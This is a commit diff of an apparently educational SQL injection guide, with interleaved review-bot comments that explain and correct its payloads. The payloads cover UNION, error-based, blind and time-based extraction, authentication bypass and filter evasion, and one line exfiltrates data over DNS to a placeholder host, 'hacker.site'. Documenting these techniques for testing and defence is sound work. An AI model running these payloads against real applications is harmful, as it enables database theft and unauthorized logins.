GitBook: [master] 491 pages modified

This commit is contained in:
CPol 2021-06-26 16:09:18 +00:00 committed by gitbook-bot
parent cd106b9c33
commit 4f109e4e87
No known key found for this signature in database
GPG Key ID: 07D2180C7B12D0FF


@ -154,7 +154,7 @@ Two methods are typically used for this purpose:
Keep incrementing the number until you get a False response. Even though GROUP BY and ORDER BY have different functionality in SQL, they both can be used in the exact same fashion to determine the number of columns in the query.
```text
```sql
1' ORDER BY 1--+ #True
1' ORDER BY 2--+ #True
1' ORDER BY 3--+ #True
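Review bot: the `--+` terminator in `1' ORDER BY 1--+ #True` works only because the `+` becomes a space after URL-decoding, and MySQL requires that space for `--` to start a comment; now that the fence is tagged `sql` a one-line comment saying so (and that `#True` is the expected page behaviour, not part of the payload) would stop readers from pasting `--` without the trailing space into a non-URL context and wondering why the query errors.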
@ -162,7 +162,7 @@ Keep incrementing the number until you get a False response. Even though GROUP B
#-1' UNION SELECT 1,2,3--+ True
```
```text
```sql
1' GROUP BY 1--+ #True
1' GROUP BY 2--+ #True
1' GROUP BY 3--+ #True
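Review bot: the line `#-1' UNION SELECT 1,2,3--+ True` in the previous block puts the `#` at the start, which comments out the whole payload if copied, whereas the `ORDER BY` and `GROUP BY` lines put the marker after `--+`; suggest `-1' UNION SELECT 1,2,3--+ #True` so every line in these blocks is consistent and pasteable. A short comment that `GROUP BY N` raises the same unknown-column error as `ORDER BY N` once N exceeds the column count would also make clear why the two blocks are interchangeable.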
@ -174,7 +174,7 @@ Keep incrementing the number until you get a False response. Even though GROUP B
Select more and more null values until the query is correct:
```text
```sql
1' UNION SELECT null-- - Not working
1' UNION SELECT null,null-- - Not working
1' UNION SELECT null,null,null-- - Worked
@ -186,7 +186,7 @@ _You should use `null`values as in some cases the type of the columns of both si
On the next examples we are going to retrieve the name of all the databases, the table name of a database, the column names of the table:
```text
```sql
#Database names
-1' UniOn Select 1,2,gRoUp_cOncaT(0x7c,schema_name,0x7c) fRoM information_schema.schemata
@ -204,7 +204,7 @@ _There is a different way to discover this data on every different database, but
If for some reason you **cannot** see the **output** of the **query** but you can **see the error messages**, you can make this error messages to **ex-filtrate** data from the database.
Following a similar flow as in the Union Based exploitation you could manage to dump the DB.
```text
```sql
(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
```
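Review bot: the error-based payload on the `(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x ... group by x limit 1))` line should carry a comment on why it errors at all: `floor(rand()*2)` is re-evaluated while the GROUP BY builds its temporary table, so the same key can be inserted twice and MySQL raises a duplicate-entry error whose message contains the concatenated value, here `@@VERSION`. Because it depends on `rand()` the error is not guaranteed on every request, so the text should tell the reader to retry. The nested `CONCAT(@@VERSION)` is redundant; replacing it with a subquery such as `(select table_name from information_schema.tables limit 0,1)` would show the dumping loop the context sentence promises.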
@ -213,7 +213,7 @@ Following a similar flow as in the Union Based exploitation you could manage to
In this case you cannot see the results of the query or the errors, but you can **distinguished** when the query **return** a **true** or a **false** response because there are different contents on the page.
In this case, you can abuse that behaviour to dump the database char by char:
```text
```sql
?id=1 AND SELECT SUBSTR(table_name,1,1) FROM information_schema.tables = 'A'
```
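Review bot: `?id=1 AND SELECT SUBSTR(table_name,1,1) FROM information_schema.tables = 'A'` is not valid SQL: a subquery used as an operand must be parenthesised, and without `LIMIT` it returns many rows, so the comparison fails instead of evaluating to true or false. Suggest `?id=1 AND (SELECT SUBSTR(table_name,1,1) FROM information_schema.tables LIMIT 0,1)='A'` and a note that the `LIMIT` offset and the `SUBSTR` position are the two values iterated to walk rows and characters. Context nit: `you can **distinguished**` should read `you can **distinguish**`.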
@ -221,7 +221,7 @@ In this case, you can abuse that behaviour to dump the database char by char:
This is the **same case as before** but instead of distinguish between a true/false response from the query you can **distinguish between** an **error** in the SQL query or not \(maybe because the HTTP server crashes\). Therefore, in this case you can force an SQLerror each time you guess correctly the char:
```text
```sql
AND (SELECT IF(1,(SELECT table_name FROM information_schema.tables),'a'))-- -
```
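Review bot: `AND (SELECT IF(1,(SELECT table_name FROM information_schema.tables),'a'))-- -` never depends on a guess: the first argument of `IF` is the constant `1`, so the multi-row subquery is always chosen and the query errors on every request. The guessed-character test belongs in that argument, e.g. `IF((SELECT SUBSTR(table_name,1,1) FROM information_schema.tables LIMIT 0,1)='A',(SELECT table_name FROM information_schema.tables),'a')`, so the error is raised only when the guess is right, which is what the context sentence describes.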
@ -229,7 +229,7 @@ AND (SELECT IF(1,(SELECT table_name FROM information_schema.tables),'a'))-- -
In this case there **isn't** any way to **distinguish** the **response** of the query based on the context of the page. But, you can make the page **take longer to load** if the guessed character is correct. We have already saw this technique in use before in order to [confirm a SQLi vuln](./#confirming-with-timing).
```text
```sql
1 and (select sleep(10) from users where SUBSTR(table_name,1,1) = 'A')#
```
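Review bot: `1 and (select sleep(10) from users where SUBSTR(table_name,1,1) = 'A')#` mixes two tables: `table_name` is a column of `information_schema.tables`, not of `users`, so the query fails with an unknown-column error rather than sleeping. Suggest `1 and (select sleep(10) from information_schema.tables where substr(table_name,1,1)='A' limit 1)#` or the `IF(cond, sleep(10), 0)` form, and mention that `sleep()` runs once per matching row, so without `LIMIT 1` the delay multiplies and the timing signal becomes unreliable. Context nit: `We have already saw` should read `We have already seen`.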
@ -243,7 +243,7 @@ You can use stacked queries to **execute multiple queries in succession**. Note
If **no-other** exploitation method **worked**, you may try to make the **database ex-filtrate** the info to an **external host** controlled by you. For example, via DNS queries:
```text
```sql
select load_file(concat('\\\\',version(),'.hacker.site\\a.txt'));
```
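Review bot: the out-of-band payload `select load_file(concat('\\\\',version(),'.hacker.site\\a.txt'));` should state its preconditions: it builds a UNC path, so the DNS lookup happens only when the MySQL server runs on Windows, `load_file` requires the FILE privilege and is blocked by a restrictive `secure_file_priv`, and the exfiltrated value becomes a DNS label, so anything longer than 63 characters or containing characters not valid in a hostname has to be hex-encoded with `hex()` and split into chunks. `hacker.site` should be marked as a placeholder for the attacker-controlled domain.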
@ -270,13 +270,13 @@ List to try to bypass the login functionality:
When a raw md5 is used, the pass will be queried as a simple string, not a hexstring.
```text
```sql
"SELECT * FROM admin WHERE pass = '".md5($password,true)."'"
```
Allowing an attacker to craft a string with a `true` statement such as `' or 'SOMETHING`
```text
```sql
md5("ffifdyop", true) = 'or'6<>]<5D><>!r,<2C><>b<EFBFBD>
```
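Review bot: the digest on the `md5("ffifdyop", true) = 'or'6...` line is mostly unprintable bytes and has come through as mojibake; render it as hex instead (the visible `'or'6` prefix is bytes 27 6f 72 27 36) so the block is readable. It should also explain why the resulting `WHERE pass = ''or'6...'` matches every row: the operand after `or` is a string literal starting with `6`, which MySQL converts to the number 6 in a boolean context, so the condition is non-zero regardless of the stored hash.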
@ -284,7 +284,7 @@ Challenge demo available at [http://web.jarvisoj.com:32772](http://web.jarvisoj.
### Hash Authentication Bypass
```text
```sql
admin' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055'
```
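Review bot: `admin' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055'` needs a sentence on the assumption behind it: the original query must return exactly two columns (username, password hash) that the application then compares with the hash of the submitted password, so the attacker logs in as `admin` using the plaintext whose MD5 is the injected value (`1234` here). The column count and order must match the original SELECT, which ties back to the column-enumeration section earlier on the page.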
@ -299,7 +299,7 @@ You should use as username each line of the list and as password always: _**Pass
IF ' is being scaped you can use %A8%27, and when ' gets scaped it will be created: 0xA80x5c0x27 \(_╘'_\)
```text
```sql
%A8%27 OR 1=1;-- 2
%8C%A8%27 OR 1=1-- 2
%bf' or 1=1 -- --
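Review bot: the `%A8%27`, `%8C%A8%27` and `%bf'` payloads work only when the connection character set is a multibyte encoding such as GBK or Big5, where the lead byte (0xA8, 0xBF) and the escaping backslash 0x5C are consumed as one character, leaving the quote unescaped; the block should say so, and that the trick fails when the application escapes with the same character set the server uses or the connection is `utf8mb4`. Context nit: `scaped` should read `escaped` (twice).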
@ -318,7 +318,7 @@ print r.text
### Polyglot injection \(multicontext\)
```text
```sql
SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/
```
@ -344,7 +344,7 @@ More info: [https://blog.lucideus.com/2018/03/sql-truncation-attack-2018-lucideu
Add as much `','',''` as you consider to exit the VALUES statement. If delay is executed, you have a SQLInjection.
```text
```sql
name=','');WAITFOR%20DELAY%20'0:0:5'--%20-
```
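Review bot: `name=','');WAITFOR%20DELAY%20'0:0:5'--%20-` is Microsoft SQL Server syntax (`WAITFOR DELAY`) and relies on stacked queries, so the block should be labelled MSSQL-only rather than generic SQL; on MySQL the same INSERT would need `sleep()` inside a value expression instead of a second statement. A note that `--%20-` is the URL-encoded `-- -` comment would keep readers from treating `%20-` as part of the payload.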
@ -384,24 +384,24 @@ With this technique you can extract information creating only 1 account. It is i
Using **hex2dec** and **substr**:
```text
```sql
'+(select conv(hex(substr(table_name,1,6)),16,10) FROM information_schema.tables WHERE table_schema=database() ORDER BY table_name ASC limit 0,1)+'
```
To get the text you can use:
```text
```python
__import__('binascii').unhexlify(hex(215573607263)[2:])
```
Using **hex** and **replace** \(and **substr**\):
```text
```sql
'+(select hex(replace(replace(replace(replace(replace(replace(table_name,"j"," "),"k","!"),"l","\""),"m","#"),"o","$"),"_","%")) FROM information_schema.tables WHERE table_schema=database() ORDER BY table_name ASC limit 0,1)+'
'+(select hex(replace(replace(replace(replace(replace(replace(substr(table_name,1,7),"j"," "),"k","!"),"l","\""),"m","#"),"o","$"),"_","%")) FROM information_schema.tables WHERE table_schema=database() ORDER BY table_name ASC limit 0,1)+'
Full ascii uppercase and lowercase replace:
#Full ascii uppercase and lowercase replace:
'+(select hex(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(substr(table_name,1,7),"j"," "),"k","!"),"l","\""),"m","#"),"o","$"),"_","%"),"z","&"),"J","'"),"K","`"),"L","("),"M",")"),"N","@"),"O","$$"),"Z","&&")) FROM information_schema.tables WHERE table_schema=database() ORDER BY table_name ASC limit 0,1)+'
```
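Review bot: the extraction blocks should explain the two constraints that shape them. First, the `'+(select ...)+'` wrapper injects into a numeric addition, so only a leading run of decimal digits survives; that is why the first block uses `conv(hex(...),16,10)` to get a pure decimal, and why the second block replaces `j`,`k`,`l`,`m`,`o`,`z`,`J`..`O`,`Z` and `_` (whose hex bytes contain `a`-`f`) with characters whose hex is all digits (space is 20, `!` is 21, `"` is 22, and so on). Lowercase `n` (0x6e) is missing from that chain, so any name containing `n` is cut off at that character; add `"n"` to the replace list. Second, `conv()` is limited to 64-bit values, so at most 8 ASCII bytes fit per call, which is why `substr` takes 6 or 7 characters and the reader must advance the `substr` offset and the `limit 0,1` row index with each account created. The Python helper `binascii.unhexlify(hex(215573607263)[2:])` is fine for printable ASCII (always an even number of hex digits) but a comment saying so, or a left-pad with `'0'`, would prevent surprises.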
@ -411,8 +411,8 @@ Routed SQL injection is a situation where the injectable query is not the one wh
Example:
```text
Hex of: -1' union select login,password from users-- a
```sql
#Hex of: -1' union select login,password from users-- a
-1' union select 0x2d312720756e696f6e2073656c656374206c6f67696e2c70617373776f72642066726f6d2075736572732d2d2061 -- a
```
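Review bot: the routed payload `-1' union select 0x2d3127... -- a` should say why the hex literal works: MySQL treats an unquoted `0x...` literal as a binary string, so the first query returns the decoded text `-1' union select login,password from users-- a`, which the application then embeds unescaped into the second query, where it is executed. The hex in the line does decode to the text in the comment above it, so moving that text into a `#` comment inside the `sql` fence is fine.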
@ -420,7 +420,7 @@ Hex of: -1' union select login,password from users-- a
No Space \(%20\) - bypass using whitespace alternatives
```text
```sql
?id=1%09and%091=1%09--
?id=1%0Dand%0D1=1%0D--
?id=1%0Cand%0C1=1%0C--
@ -431,13 +431,13 @@ No Space \(%20\) - bypass using whitespace alternatives
No Whitespace - bypass using comments
```text
```sql
?id=1/*comment*/and/**/1=1/**/--
```
No Whitespace - bypass using parenthesis
```text
```sql
?id=(1)and(1)=(1)--
```
@ -451,7 +451,7 @@ SELECT 1,2,3,4 -> UNION SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELE
Blacklist using keywords - bypass using uppercase/lowercase
```text
```sql
?id=1 AND 1=1#
?id=1 AnD 1=1#
?id=1 aNd 1=1#
@ -471,7 +471,7 @@ WHERE -> HAVING --> LIMIT X,1 -> group_concat(CASE(table_schema)When(database())
{% embed url="https://github.com/m4ll0k/Atlas" caption="" %}
## Other GUIDES
## Other Guides
* [https://sqlwiki.netspi.com/](https://sqlwiki.netspi.com/)
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection)